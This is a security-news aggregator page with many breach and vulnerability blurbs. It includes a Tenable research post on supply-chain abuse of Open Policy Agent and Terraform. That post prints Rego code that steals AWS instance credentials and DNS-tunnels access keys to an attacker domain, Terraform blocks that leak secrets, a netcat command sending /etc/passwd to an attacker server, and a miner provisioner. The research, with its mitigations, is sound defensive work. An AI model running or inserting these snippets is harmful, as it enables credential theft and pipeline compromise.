Discover the key strategies enterprises need — talent, efficiency, infrastructure, and cohesion — to scale generative AI projects and sustain long-term competitive advantage.

by ITPro Today

It’s interesting to note that many people will happily unlock their phone by just looking at it and have no problem tapping their bank card against a store’s point of sale terminal, but if the term password security is presented to them, they have a blank expression, or worse, shrink away. Why are some technologies […] The post The Stealthy Success of Passkeys appeared first on IT Security Guru.

by IT Security Guru

by ComputerWeekly

Maxar Space Systems, a leading global innovator in satellite manufacturing and space technology, recently reported a data breach that exposed sensitive employee information. The breach was disclosed in a notification to affected individuals, a sample of which was submitted to the California authorities. According to the notification, Maxar discovered unauthorized access to its systems, prompting … The post Satellite Maker Maxar Space Systems Confirms Data Breach appeared first on CyberInsider.

by Cyber Insider

A critical authentication bypass vulnerability has been disclosed in the Really Simple Security (formerly Really Simple SSL) plugin for WordPress that, if successfully exploited, could grant an attacker to remotely gain full administrative access to a susceptible site. The vulnerability, tracked as CVE-2024-10924 (CVSS score: 9.8), impacts both free and premium versions of the plugin. The

by The Hacker News

The Library of Congress has notified lawmakers of a “cyber breach” of its IT system by an adversary and a hack of emails. The post Library of Congress Says an Adversary Hacked Some Emails appeared first on SecurityWeek.

by SecurityWeek

T-Mobile confirmed being a victim of recent hacking campaigns linked to China-based threat actors targeting telecom companies. T-Mobile confirms it was hacked as part of a long-running cyber espionage campaign targeting Telco companies. Recently, the FBI and CISA announced they are continuing to investigate a large-scale cyber-espionage campaign by China-linked threat actors targeting U.S. telecoms, […]

by Security Affairs

Know the pros and cons of cloud-based AI accelerators before deciding whether cloud or on-prem AI hardware aligns best with your workload requirements.

by ITPro Today

by ComputerWeekly

While SVG primarily enables the crafting of images using text, lines, and shapes in code rather than pixels, such files could also be utilized to show HTML and facilitate JavaScript execution in credential-stealing phishing forms.

by SC Media

T-Mobile has also been targeted by the Chinese group Salt Typhoon in a major espionage campaign targeting US telecom companies.  The post T-Mobile Also Targeted in Chinese Telecom Hacking Campaign appeared first on SecurityWeek.

by SecurityWeek

Malicious actors could leverage the vulnerability, which stems from improper user check error management in the two-factor REST API action, to facilitate high-privileged account breaches that could then be used for additional attacks, according to Defiant, a WordPress security provider.

by SC Media

While WhatsApp proceeded to disable the ""Eden"" exploit leveraged by NSO Group, the Israeli firm proceeded to create the ""Erised"" vector to target the app''s users until May 2020, noted a court filing from Meta, which also noted that NSO Group, and not its customers, was primarily behind the spyware attacks.

by SC Media

Malicious emails spoofing Israel''s National Cyber Directorate have been leveraged by Cotton Sandstorm to lure targeted entities into downloading a Google Chrome security update, which facilitates the delivery of WezRAT that enables file downloading, screenshot capturing, keystroke logging, clipboard content extraction, and Chromium browser cookie compromise.

by SC Media

Attackers delivered phishing emails with a ZIP file attachment with an executable Rust-based loader, which prompts Windows batch scripts that not only open lure documents but also facilitate the deactivation of antivirus software prior to the deployment of the Python-based information-stealing malware, an analysis from Cisco Talos showed.

by SC Media

by ComputerWeekly

Check out our deep dive into both new and known techniques for abusing infrastructure-as-code and policy-as-code tools. You’ll also learn how to defend against them in this blog post which expands on the attack techniques presented at our fwd:cloudsec Europe 2024 talk “Who Watches the Watchmen? Stealing Credentials from Policy-as-Code Engines (and beyond).”Infrastructure-as-code (IaC) is the backbone of DevOps for modern cloud applications. Policy engines and policy-as-code languages have emerged as key tools to govern IaC deployments, due to their sensitivity and complexity. They are also a common tool for authorization in cloud-native applications and admission control in Kubernetes.In this blog post, we will explore both known and newly uncovered attack techniques in domain-specific languages (DSLs) of popular policy-as-code (PaC) and infrastructure-as-code (IaC) platforms - specifically in the open source Open Policy Agent (OPA) and in HashiCorp’s Terraform. Since these are hardened languages with limited capabilities, they’re supposed to be more secure than standard programming languages – and indeed they are. However, more secure does not mean bulletproof. We''ll explore specific techniques we discovered which adversaries can use to manipulate these DSLs through third-party code, leading to compromised cloud identities, lateral movement and data exfiltration.Attack techniques deep diveOpen Policy Agent (OPA)OPA is a widely used policy engine. You can use it for various use cases, from microservice authorization to infrastructure policies. Basically, OPA can analyze and make policy decisions based on any data of JavaScript Object Notation (JSON) form. It shifts the policy decision-making away from the target application, allowing it to query OPA and focus solely on enforcing the decisions OPA makes based on the provided input and policies. Policies in OPA are written using Rego, a dedicated high-level, declarative policy language, or DSL, if you will. We will soon see that Rego has some interesting built-in functions that, when in the wrong hands, can be used to do some pretty evil things.Attack scenarioOur research focused on the supply-chain attack vector in OPA, and more specifically, when an attacker gains access to the supply chain of OPA’s policies. Attackers can leverage this vector to insert a malicious Rego policy that will be executed during policy evaluation, to achieve malicious objectives like credentials exfiltration.  In this scenario, OPA regularly fetches policies from a storage bucket, with a web application relying on OPA for authorization. All is well until an attacker gains access through a compromised access key, needing only write access to the policy bucket. The attacker uploads a malicious policy, which OPA retrieves during its next local update. When the web application sends an authorization request, OPA performs the policy evaluation and executes the malicious Rego code, potentially leading to dangerous outcomes, such as leaking sensitive data to an attacker-controlled server.Exfiltrating source code and environment variablesWe could only find a single blog post exploring malicious abuse of Rego. In his blog post, software engineer Liam Galvin showcased built-in OPA functions that attackers could abuse: opa.runtime().env for accessing environment variables and http.send for exfiltrating them. Additionally, the input keyword can be used to exfiltrate HCL code sent to OPA.Taking it furtherThe opa.runtime and http.send functions got some bad attention in 2022, when a researcher discovered a vulnerability bypassing the WithUnsafeBuiltins function, which can be used to block certain built-in functions and fail policies that use them. These two functions were cited as examples of functions that organizations might want to block. If an organization has some awareness about the security of OPA (and the possibility of blocking these functions’ use without breaking their use-case), it would probably block them through OPA’s Capabilities feature. This got us thinking:Is it possible to fetch cloud credentials without using the opa.runtime function?Is it possible to leak data outside of the environment without using the http.send function?Extracting credentials from IMDSv2Using the OPA runtime function we can fetch environment variables, including potential cloud credentials. This sparked our curiosity: If its usage is blocked on the OPA server side, can we still extract cloud credentials somehow?  We then decided to try fetching credentials from the AWS Instance Metadata Service (IMDS), considering OPA might run on a cloud instance with an attached role. We used the bash commands from AWS documentation as a reference, and crafted the Rego code to interact with IMDSv2, which is the default in new environments and less straightforward to work with. This enabled us to retrieve instance role credentials and leak them to our external server using a single built-in function: http.send. It took several iterations. As anyone who has worked with Rego knows, it loves to keep you guessing with non-indicative errors. Finally, this is what our code looked like:package extract_creds default token_ttl_seconds = ""21600"" req1 := {""url"": ""http://169.254.169.254/latest/api/token"", ""method"": ""put"", ""headers"": {""X-aws-ec2-metadata-token-ttl-seconds"": token_ttl_seconds}} resp1 := http.send(req1) req2 := {""url"": ""http://169.254.169.254/latest/meta-data/iam/security-credentials/"", ""method"": ""get"", ""headers"": { ""X-aws-ec2-metadata-token"": resp1[""raw_body""]}} resp2 := http.send(req2) url_val := concat(""/"", [""http://169.254.169.254/latest/meta-data/iam/security-credentials"", resp2[""raw_body""]]) req3 := {""url"": url_val, ""method"": ""get"", ""headers"": { ""X-aws-ec2-metadata-token"": resp1[""raw_body""]}} resp3 := http.send(req3) req4 := {""url"": ""http://<attacker_server>/"", ""method"": ""put"", ""headers"": { ""X-aws-ec2-metadata-token"": resp3[""raw_body""]}} resp4 := http.send(req4)Attack demo It’s important to note that allowing policies, especially when sourcing them from third-parties, to interact with other internal servers and services is highly discouraged and exposes the environment to significant risks like credential theft. We need to remember that IMDSv2 does not make your instance role credentials bulletproof. They are still reachable when achieving code execution on the machine. At the end of this blog post, we will reference some effective mitigations to defend against such attacks.DNS tunnelingThat’s all well and good if we can run the http.send function within policies. But what happens if an OPA deployment restricts its use? We wanted to see whether it was possible to achieve data exfiltration by other means. We dove into OPA’s documentation again, and the Net category’s net.lookup_ip_addr function looked particularly interesting: it actively looks up a host, and returns its IP address. So we thought: What if we look up a domain under the attacker’s control and monitor the DNS requests?We set up a server to capture the DNS requests and ran a simple policy using the net.lookup_ip_addr function. Sure enough, we could see a request coming to our server. What about trying to embed sensitive data as a subdomain of our malicious domain (aka DNS tunneling)? We concatenated an access key that was hard-coded in the input Terraform configuration passed to OPA, as a subdomain of our domain, and passed the new domain string to the net.lookup_ip_addr function. We then ran the Rego policy.package dns_tunneling parent_domain := ""<attacker_domain>"" # Form the domain tunneling string and perform the lookup result = domain_str { provider_list := input.provider.aws provider_list != [] provider := provider_list[0] access_key := provider.access_key secret_key := provider.secret_key domain_arr := [access_key, secret_key, parent_domain] domain_str := concat(""."", domain_arr) addr := net.lookup_ip_addr(domain_str) }And, voilà! The request, with the access key embedded in it, arrived at our listener. Left side: Server listening for DNS Requests. Right Side: Victim OPA server running the malicious policy. So, the net.lookup_ip_addr function is another function you might consider restricting or at least looking out for in policies, since it also introduces the risk of data exfiltration from your OPA deployment.Up until this point, we''ve talked about techniques in OPA, which is a policy engine. We were curious about Terraform, since it also uses a declarative language, and wanted to see if it might be affected by similar techniques.TerraformTerraform has long been a highly adopted IaC tool due to its declarative, platform-agnostic nature, community support and shareable components. Configurations in Terraform are also written using a dedicated high-level, declarative DSL - HashiCorp Configuration Language (HCL). Terraform has two kinds of third-party components that can be shared through the Terraform Registry or other (public or private) registries: Modules and Providers. These are commonly used for efficiency, and even for enhanced security when used right. However, if used carelessly, they can introduce a serious supply chain risk.Terraform CI/CD riskUsing HashiCorp’s “Setup Terraform” Github Action, many organizations configure every pull request to trigger the format, init, validate and plan phases of Terraform. Moreover, HashiCorp’s documentation presents the option to test pull requests using Terraform plan. It seems logical that the Plan phase triggers on every PR in a Terraform code repository to identify necessary changes before applying them. Or does it? Screenshot taken from the README of HashiCorp’s Github action - https://github.com/has›hicorp/setup-terraform It appears that the Plan phase is not as innocent as one might think. While resources are not deployed during this stage, data sources, which are another kind of block in Terraform that allows fetching external data to be used throughout the configuration, execute at this stage.To recap, in many CI/CD pipelines today, terraform plan runs as part of a pull_request trigger. This means that any developer that can open a pull request (usually any developer in open-source projects, or any developer in the organization in private repositories) can trigger code execution on the Github runner without any code review, assuming they are able to update Terraform files. This poses a risk, as an external attacker in a public repository or a malicious insider (or an external attacker with a foothold) in a private repository could exploit a pull request for their malicious objectives.Example of malicious techniques for abusing data sourcesAs we just learned, data sources run during terraform plan, which significantly lowers the entry point for attackers, making it possible, in some repositories, to execute unreviewed changes during CI/CD.(Note: To use a data source in a Terraform configuration, you need to import the provider that implements it.)External data sourceUsing the external data source, you can run custom code on the machine running Terraform. According to HashiCorp, the external data source serves as an “escape hatch” for exceptional situations. Its abuse was also explored in Alex Kaskaso’s blog, demonstrating how you can run code during the Terraform Plan phase by writing custom Terraform providers, or by using the external data source from the existing external provider.To achieve code execution on the host, you simply need to import the external provider and insert an external data block in your configuration, referencing a local script file:data ""external"" ""example"" { program = [""python"", ""${path.module}/exfil_env_results.py""] }HTTP data sourceUsing the HTTP data source, you can fetch necessary data for your configuration - but it also opens the door for malicious exfiltration. As xssfox demonstrated, a malicious Terraform module can easily leak secrets to an attacker-controlled domain.The HTTP data source may also be effective for fetching credentials from the IMDS. However, I couldn’t extract creds from IMDSv2 since it requires the HTTP PUT method, which HCL doesn’t permit - only GET, HEAD, and POST are allowed.data ""http"" ""supersecurerequest"" { url = ""https://<attacker_server>/${aws_secretsmanager_secret_version.secret_api_key.secret_string}"" }DNS data sourceAs we previously discussed, we discovered a DNS tunneling technique in OPA, allowing us to stealthily leak sensitive data. This got us thinking: Why not try DNS tunneling in Terraform, too?We looked into HashiCorp’s documentation, and found HashiCorp’s official DNS provider. Similarly to Rego’s net.lookup_ip_addr, its data sources allow you to perform DNS lookups. Once again, we tried embedding a secret as a subdomain of our malicious domain. We then listened for DNS requests, and ran terraform plan with the hopes of catching the secret on our external server.data ""dns_a_record_set"" ""superlegitdomain"" { host = ""${aws_secretsmanager_secret_version.password.secret_string}.<attacker_domain>"" }And, boom! The request, including the embedded secret string, was caught by our listener: To recap, here’s the flow of events: terraform plan triggers on a pull request The unreviewed code includes a malicious data sourceBefore the DevOps engineer can say ''supercalifragilisticexpialidocious,'' the sensitive data is already off to the attacker’s serverExample of malicious techniques for abusing provisionersHashiCorp states the provisioners are a last resort, saying that they allow you to ״model specific actions on the local machine or on a remote machine in order to prepare servers or other infrastructure objects for service״. Or, in simple words, you can run custom code on the machine running Terraform or on the newly provisioned infrastructure.“Local-exec” provisionerThe local-exec provisioner “invokes a local executable after a resource is created” according to HashiCorp. It runs the supplied command on the machine running Terraform, basically allowing any Bash command execution. For example, you could leak the contents of /etc/passwd to an attacker-controlled server:provisioner ""local-exec"" {  command = ""cat /etc/passwd | nc <attacker_server> 1337""  }“Remote-exec” provisionerThe remote-exec provisioner “invokes a script on a remote resource after it is created” according to HashiCorp. It allows you to run custom code on newly provisioned infrastructure. For example, you could run a coin miner on a newly created EC2 machine:provisioner ""remote-exec"" { script = ""./xmrig/xmrig.sh"" }Other notable Terraform researchSecurity engineers Mike Ruth and Francisco Oca demonstrated multiple attack scenarios against Terraform Enterprise (TFE) and Terraform Cloud (TFC) and also released a tool that can stealthily run terraform apply during terraform plan.Some interesting attack primitives were discovered by Daniel Grzelak from Plerion, who demonstrated how you can delete resources or run malicious code through a custom provider, with the only access required for the attack being write access to the state file, which is often stored in S3.Mitigations and best practicesImplement a granular role-based access control (RBAC) and follow the principle of least privilege. This should be applied to the local user running the IaC or PaC framework, the users that can access it via API, and the associated cloud roles. Separate roles may be used for the Terraform Plan and Apply stages, to prevent unreviewed modifications of IaC resulting in cloud infrastructure changes.Only use third-party components from trusted sources: modules and providers in Terraform, and policies in OPA (These are some examples for components that, when used from third parties, should be sourced cautiously). Verify their integrity to ensure no unauthorized changes were made prior to their execution.Set up application-level and cloud-level logging for monitoring and analysis.Limit the network and data access of the applications and the underlying machines. To prevent communication with other internal servers through OPA policies, as discussed in the attack techniques section, you may use OPA’s capabilities.json file to restrict outbound network connections (using the allow_net field to restrict the hosts that can be contacted by the http.send and net.lookup_ip_addr functions).Scan before you plan! Prevent automatic execution of unreviewed and potentially malicious code in your CI/CD pipeline by placing your scanner before the terraform plan stage.**According to our testing, most common scanners fail to detect most of the risks we’ve discussed. Currently, in order to detect code execution and exfiltration techniques in IaC and PaC, you need to create custom policies according to your organization’s needs and your environment’s baseline. For more details, watch the recording of our talk “Who Watches the Watchmen? Stealing Credentials from Policy-as-Code Engines (and beyond)"" at the fwd:cloudsec Europe 2024 conference. You can find the slides here. How Tenable Cloud Security can helpShifting cloud security left helps you improve security and compliance before runtime. Tenable offers IaC scanning as part of Tenable Cloud Security, our comprehensive cloud native application protection platform (CNAPP). Tenable Cloud Security enables organizations to scan and detect misconfigurations and other risks in their IaC configurations to harden cloud infrastructure environments as part of the CI/CD pipeline and take action on cloud exposures. To get more information, check out our “Shift Left on Cloud Infrastructure Security” solution overview and go to our page “Shift-left with IaC security.”

by Tenable

by ComputerWeekly

DeepData, which has a layout identical to LightSpy and features a dozen infostealing-focused plugins, enables not only the exfiltration of data from browsers, password managers, and social networking apps, but also the recording of audio from its targets, according to an analysis from the BlackBerry Research and Intelligence Team.

by SC Media

Infiltration of AnnieMac''s systems between Aug. 21 and 23 resulted in the potential copying of individuals'' names and Social Security numbers, said the New Jersey-based mortgage lender in breach notification letters, which noted the lack of evidence suggesting the dissemination of the exposed data on the dark web.

by SC Media

GDPR protects sensitive data like health and financial details, and its enforcement underscores the growing need for stronger data security measures. GDPR: The landscape of data privacy and protection has never been more critical. With regulators around the world intensifying scrutiny, companies are facing increasing pressure to comply with stringent data protection laws. The latest […]

by Security Affairs

Security revenue doubled to $2 billion in Cisco’s recent quarter. Without Splunk’s contribution, its total revenue would have dropped 14%.

by Cybersecurity Dive

CISA confirmed that political appointees of the Biden administration will also depart the agency as the Trump administration takes over.

by Cybersecurity Dive

A list of topics we covered in the week of November 11 to November 17 of 2024

by Malwarebytes Labs

by ComputerWeekly

Overview The Cybersecurity and Infrastructure Security Agency (CISA) has officially added two high-severity vulnerabilities affecting Palo Alto Networks Expedition to its Known Exploited Vulnerability (KEV) Catalog. The two Palo Alto Networks vulnerabilities, which are actively being targeted by cybercriminals, are identified as CVE-2024-9463 and CVE-2024-9465; both have critical severity ratings and are known to be actively exploited in real-world attacks. Organizations using affected versions of Palo Alto Networks Expedition are urged to take immediate action to mitigate the risks. The vulnerabilities in question—CVE-2024-9463 (OS Command Injection) and CVE-2024-9465 (SQL Injection)—impact Palo Alto Networks’ Expedition software, a tool for migrating and optimizing PAN-OS configurations. Both flaws have been assigned CVSSv4 scores of 9.9 and 9.2, respectively, signifying their high criticality. These vulnerabilities could allow attackers to gain unauthorized access to sensitive data or execute arbitrary commands on affected systems, posing online risks to organizations’ security. Details of Palo Alto Networks Vulnerabilities: CVE-2024-9463 and CVE-2024-9465 The first vulnerability, CVE-2024-9463, is a critical OS command injection flaw that affects Palo Alto Networks Expedition. Assigned a CVSSv4 score of 9.9, this vulnerability allows unauthenticated attackers to execute arbitrary operating system commands on the affected system. If successfully exploited, this can compromise the integrity of the system, giving attackers the ability to disclose sensitive information. This includes usernames, cleartext passwords, device configurations, and API keys associated with PAN-OS firewalls, which are critical for securing network traffic. Attackers exploiting this flaw can gain root access to these systems, making this vulnerability a prime target for those seeking to compromise firewall configurations and sensitive network data. Another critical flaw, CVE-2024-9465, is a SQL injection vulnerability found in Expedition. This flaw, with a CVSSv4 score of 9.2, allows attackers to interact with and manipulate the system’s database, exposing sensitive information such as password hashes, usernames, and device configurations. Exploiting this vulnerability could give attackers the ability to create and read arbitrary files on the system, which increases the risk of a full system compromise. Similar to CVE-2024-9463, the vulnerable version for CVE-2024-9465 is Expedition < 1.2.96. Additionally, proof-of-concept (PoC) exploits for this vulnerability have already been released to the public, escalating the risk of widespread attacks. As the PoC code is now accessible, it allows potential attackers to easily replicate the exploit and target vulnerable systems more efficiently. Both CVE-2024-9463 and CVE-2024-9465 are critical vulnerabilities in the Expedition software suite. Organizations that are running versions of Expedition older than 1.2.96 are strongly advised to immediately update to the latest patched version. Given the severity and the ongoing active exploitation of these vulnerabilities, patching is crucial to protect sensitive information and maintain system security. Cyble researchers have observed active exploitation of these flaws, with CVE-2024-9463 being particularly concerning due to its ability to grant attackers root-level access. This could result in a wide range of malicious activities, including data breaches, ransomware deployment, and unauthorized system modifications. Organizations should be particularly vigilant in monitoring their systems for signs of exploitation. Recommendations and Mitigations Palo Alto Networks has already released patches to address both vulnerabilities and organizations are urged to upgrade to Expedition version 1.2.96 or later. However, simply applying the patch may not be enough. The following mitigation strategies are recommended: Organizations should immediately apply the latest patches released by Palo Alto Networks to close the vulnerabilities. Ensuring that systems are updated with the latest software versions will significantly reduce the risk of exploitation. After upgrading to the fixed version of Expedition, all Expedition usernames, passwords, and API keys should be rotated to prevent attackers from using previously exposed credentials to access systems. Similarly, any firewall usernames, passwords, and API keys processed by Expedition should also be updated to maintain system security. Organizations should implement comprehensive monitoring and logging solutions to detect suspicious activities. SIEM (Security Information and Event Management) tools can help organizations identify and respond to potential exploitation attempts in real-time. Regular vulnerability assessments and penetration testing should be conducted to identify and address any other potential weaknesses. This proactive approach ensures that other unknown vulnerabilities are addressed. Organizations should have a well-defined incident response and recovery plan in place, which includes procedures for detecting, responding to, and mitigating the effects of an attack. Regular testing and updates to the plan are crucial to ensure readiness against online threats. Conclusion The inclusion of CVE-2024-9463 and CVE-2024-9465 in CISA''s Known Exploited Vulnerabilities catalog highlights the urgent need for organizations to address these critical vulnerabilities in the Palo Alto Networks Expedition. With active exploitation ongoing, it is important for organizations using vulnerable versions to prioritize patching and apply recommended security measures. Delaying action could lead to severe data breaches and system compromises. References: https://www.cisa.gov/news-events/alerts/2024/11/14/cisa-adds-two-known-exploited-vulnerabilities-catalog https://nvd.nist.gov/vuln/detail/cve-2024-9463 https://nvd.nist.gov/vuln/detail/cve-2024-9465 The post CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog appeared first on Cyble.

by CYBLE

A new hacker collective, known as the APT group DONOT, has targeted critical sectors of Pakistan’s economy, specifically the maritime and defense manufacturing industries.  By leveraging advanced malware and targeted social engineering strategies, the DONOT hacker group has successfully compromised sensitive infrastructure.    As per reports by Cyble Research and Intelligence Labs (CRIL), the APT group DONOT, also known as APT-C-35, has been active since 2016 and is primarily recognized for its persistent cyber espionage activities. Historically, this hacker group has focused on government agencies, military entities, and diplomatic missions, with particular emphasis on countries in South Asia. Its operations are characterized by a high degree of stealth, using sophisticated malware and custom-built tools to infiltrate target networks.   The Rise of APT Group DONOT [caption id="""" align=""alignnone"" width=""934""] Cyble Vision Threat Library (Source: Cyble)[/caption] The DONOT hacker group has previously attacked organizations by exploiting vulnerabilities in government and military systems, often using phishing emails and malicious attachments as initial infection vectors. This time, however, their focus has shifted to Pakistan’s critical manufacturing sectors, which support the country’s maritime and defense industries. Given the sensitive nature of these sectors, the attack has profound implications for both economic stability and national security.   The recent cyberattack, which Cyble researchers first identified in a report, centers on a campaign targeting the manufacturing facilities that supply equipment for Pakistan’s defense and maritime sectors. This targeted approach suggests that the DONOT hacker group is not just interested in gaining general access to systems, but rather in obtaining specific industrial and military intelligence.   The initial infection vector in this campaign was a malicious LNK (shortcut) file, which was sent in a spam email disguised as a legitimate Rich Text Format (RTF) document. This LNK file was designed to appear as though it contained encrypted data, enticing the victim to open it. Once clicked, the file triggered several PowerShell commands that downloaded additional malware, including a DLL file that acted as a ""stager"" for further exploits.   Upon execution, the malicious LNK file activated a series of commands that used PowerShell scripts to download and decrypt further payloads. These payloads were then deployed onto the compromised system, establishing a foothold that allowed the malware to persist on the infected machine. To maintain access to the network, the malware scheduled a task to execute the payload every five minutes.   Advanced Malware and Persistence Mechanisms   The malware employed by the DONOT hacker group in this attack is highly advanced, utilizing multiple encryption techniques to avoid detection by traditional security systems. The group introduced a new method of Command and Control (C&C) server communication. The malware uses AES encryption and Base64 encoding to obfuscate its communications, making it more difficult for security software to identify malicious activity.   Once the malware established its presence, it initiated a POST request to the primary C&C server, transmitting a unique device ID to authenticate the compromised machine. If the C&C server responded positively, the malware would download further payloads, configure the system for persistence, and prepare for additional stages of the attack.   In addition to encrypting communication between the victim machine and the C&C server, the hacker group DONOT also employed random domain generation for backup C&C servers. This strategy ensures that, even if the primary server is taken down, the malware can continue to operate through secondary, dynamically generated domains.   Technical Analysis: How the Attack Unfolded   [caption id="""" align=""alignnone"" width=""604""] Infection Chain of APT Group DONOT (Source: Cyble)[/caption] The malicious process begins with the execution of a PowerShell script hidden inside the LNK file. This script decrypts both the lure RTF file and the DLL payload using a simple XOR operation. The files are then extracted to the victim''s temporary directory. Following extraction, the malware deletes the PowerShell script and opens the lure document to further entice the victim.   The lure document itself was linked to Karachi Shipyard & Engineering Works (KS&EW), a prominent Pakistani defense contractor. This suggests that the attacker’s primary objective was to infiltrate the defense sector by exploiting industry-specific targets.   Once the DLL is executed, it initiates a process that extracts critical configuration data, including server addresses, encryption keys, and other task parameters, from an embedded JSON file. The malware then uses this information to communicate securely with the C&C server, requesting further instructions on how to proceed with the attack.   The stager malware also checks for the existence of a scheduled task named ""Schedule."" If this task is absent, the malware creates it, ensuring that the malicious DLL is executed every five minutes, thereby maintaining persistence on the compromised system. This tactic is part of a broader strategy to ensure the malware continues to run undetected for as long as possible.   Random Domain Generation for Backup C&C Servers   A particularly notable feature of this attack is the use of random domain generation. The DONOT hacker group has taken extra precautions to avoid detection by generating backup domains for its C&C servers. These domains are created by concatenating words from a hardcoded array of values, followed by the selection of a random top-level domain (TLD). This dynamic method of domain generation makes it harder for cybersecurity teams to shut down the C&C infrastructure, even if some of the domains are blacklisted.   The configuration file also includes fallback server URLs that are periodically updated in response to changes in the primary C&C server''s status. This flexibility ensures that the hacker group can maintain control over compromised systems, regardless of disruptions to their communication infrastructure.   New Encryption Methods and Payload Delivery  In this campaign, the DONOT hacker group introduced a more sophisticated approach to payload delivery. Unlike previous campaigns where the decryption key was hardcoded into the configuration file, this time, the decryption key was embedded within the binary itself, making it harder for analysts to detect.   The malware''s ability to download, decrypt, and execute additional payloads represents a more advanced and nuanced approach to cyber espionage. Once the payload is successfully decrypted, the malware creates a scheduled task to execute the final payload, which could range from data exfiltration tools to additional malicious code capable of causing long-term damage to the compromised systems.   The recent cyberattack by the DONOT APT group marks a significant escalation in their tactics, using advanced methods like PowerShell exploitation, dynamic domain generation, and enhanced encryption to evade detection. This attack, targeting Pakistan''s sensitive maritime and defense sectors, highlights the growing threat posed by such sophisticated groups.    To counter this, organizations must strengthen cybersecurity defenses by deploying robust endpoint detection, conducting regular audits, and training employees to recognize phishing attempts. Proactive threat hunting and a clear incident response plan are essential to defending against future attacks. Vigilance and preparedness remain critical in mitigating the risks from advanced persistent threats like DONOT. 

by The Cyber Express

The Microsoft 365 Admin Portal is being abused to send sextortion emails, making the emails appear trustworthy and bypassing email security platforms. [...]

by BleepingComputer

A Really Simple Security plugin flaw affects 4M+ sites, allowing attackers full admin access. It’s one of the most critical WordPress vulnerabilities ever. Wordfence researchers warn of a vulnerability, tracked as CVE-2024-10924 (CVSS Score of 9.8), in the Really Simple Security plugin that affects 4M+ sites. The Really Simple Security plugin, formerly Really Simple SSL, is […]

by Security Affairs

Making your organization’s attack surface lean and agile improves your cyber resilience and demotivates bad actors. The first step to avoid cyber attacks is to get your attack surface in order. The Sweepatic External Attack Surface Management (EASM) Platform is built to help you with building cyber resilience. It lists, structures and prioritizes observations by […] The post How to increase cyber resilience appeared first on Outpost24.

by Outpost24

A Practical Guide to Network Traffic Analysis for Developing an Advanced Packet SnifferContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Cybercrime Group ShinyHunters Demands £400,000 Ransom to Prevent Data SaleContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Free ArticesContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Zero-Day Exploits: Uncovering the Secrets of Cyber Attacks Before They’re Even Known!Have You Ever Wondered What a “Zero-Day” Attack Really Is?Picture this: You’re peacefully going about your day, working on your computer, checking your emails, maybe even doing a little online shopping. But little do you know, a hacker has discovered a secret door to your computer — a hidden vulnerability that no one knows about, not even the company that made your software. That’s a Zero-Day Exploit.So, what’s a Zero-Day, and why is it such a big deal in the cybersecurity world? In simple terms, a Zero-Day Exploit refers to an attack that takes advantage of a software flaw that is unknown to the software vendor. In other words, it’s a bug that no one knows exists until an attacker finds it and uses it. That’s why it’s called “Zero-Day” — the vendor has had zero days to fix it before the bad guys strike!How Do These Attacks Happen? Let’s Break It Down!Let’s take a quick journey into the world of hacking. Think of a Zero-Day like a treasure map — you know, the kind where the “X” marks the spot. Here’s how the treasure hunt goes down:Discovery: First, an attacker or a researcher stumbles upon a vulnerability — like a hidden flaw in a website, app, or even a big operating system like Windows or Android. They might find it by accident or through clever searching.Example: Imagine you’re a hacker who finds that a popular video game app has a bug that lets you access other players’ accounts. No one knows about it, so you’re the first to discover this hidden weakness.Weaponization: Now, the attacker turns this discovery into a weapon. They write malicious code that uses the flaw to hack into systems, steal data, or do something far worse. It’s like building a tool to open a lock that no one has the key to.Exploitation: The attacker uses the weapon (exploit) to break into a system and cause havoc. This is where things get serious — because no patch is available yet, everyone’s vulnerable!The Dangerous Life of a Zero-DayLet’s say you’re using a well-known application, and suddenly, an attacker uses a Zero-Day exploit against you. It’s like someone breaking into your house through a window you didn’t even know existed.Here’s how the whole drama unfolds in real-time:Vulnerability: The flaw exists but is hidden. You have no clue it’s there.Discovery: A hacker, researcher, or exploit developer finds this flaw and decides to make use of it.Weaponization: The flaw is turned into an exploit (a “tool” to take advantage of it).Exploitation: The bad guys launch the exploit, often infecting thousands or millions of systems before anyone knows what’s happening.Discovery and Fix: Finally, the software vendor finds out and quickly releases a patch. But by now, the damage might already be done.The Real-World Impact of Zero-Day ExploitsYou might be wondering, “Okay, this sounds scary, but has it really caused any chaos?” Let’s look at some mind-blowing examples!1. Stuxnet: The Cyberweapon that Broke the Internet (and a Nuclear Facility!)One of the most famous examples of a Zero-Day exploit is the Stuxnet worm. This isn’t just any hacker story — this is the tale of how a computer virus used multiple Zero-Day vulnerabilities to sabotage Iran’s nuclear enrichment facility. Stuxnet wasn’t just an ordinary virus; it was a cyberweapon designed to physically destroy equipment!Imagine this: A computer virus spreads through networks, finds its target, and then, instead of stealing data, it breaks the machinery of a nuclear plant. All done through several hidden vulnerabilities that no one knew about until it was too late. The world had zero days to prepare.2. The Apple FaceTime Bug (2019)In 2019, a Zero-Day vulnerability was discovered in Apple’s FaceTime app. If you called someone using FaceTime, the phone would start recording the call before they even answered! Yikes, right? The bug allowed a person to listen to someone’s private conversation without their knowledge.This was a big deal. Imagine you’re chatting with a friend, and someone is secretly listening in! Apple quickly patched the issue, but the damage was done. This example shows how dangerous Zero-Day exploits can be, even in something as everyday as a video call app.Why Are Zero-Day Exploits So Dangerous?Here’s why Zero-Day exploits are such a nightmare:No Warning: There’s no “heads-up” before the exploit is used. You’re simply caught off guard, and by the time a patch comes out, the attacker has already done their damage.Wide-Scale Impact: If the flaw exists in a widely-used app, like a browser or operating system, millions of people could be affected. The more popular the software, the greater the risk.Targeted Attacks: While some Zero-Days are used in widespread attacks, others are extremely targeted. Governments, companies, and high-profile individuals can be victims of highly specific Zero-Day exploits.How Can You Protect Yourself?While it’s hard to fully protect yourself from Zero-Day attacks (since, well, the exploit is unknown), there are some steps you can take to stay safe:Regularly Update Your Software: Even though Zero-Day vulnerabilities are unknown, patching known vulnerabilities is your best defense. Stay on top of your software updates!Tip: Turn on automatic updates! No more clicking “remind me later.”Use Endpoint Security: Tools like EDR (Endpoint Detection and Response) can help detect unusual activities and prevent exploits from spreading, even before they’re patched.Be Careful with Downloads: Avoid downloading software from untrusted sources. Even if an attacker hasn’t discovered a Zero-Day yet, they might try to exploit your computer through other means.Network Segmentation: If you’re managing a business or a larger network, dividing your network into smaller parts can help limit the spread of an attack. Even if a Zero-Day hits, it won’t wreak havoc across your entire system.Use Strong Passwords and Multi-Factor Authentication (MFA): Even if attackers get into one system, strong passwords and MFA make it harder for them to break further into your network.Zero-Day: A Real Game of Cat and MouseThe 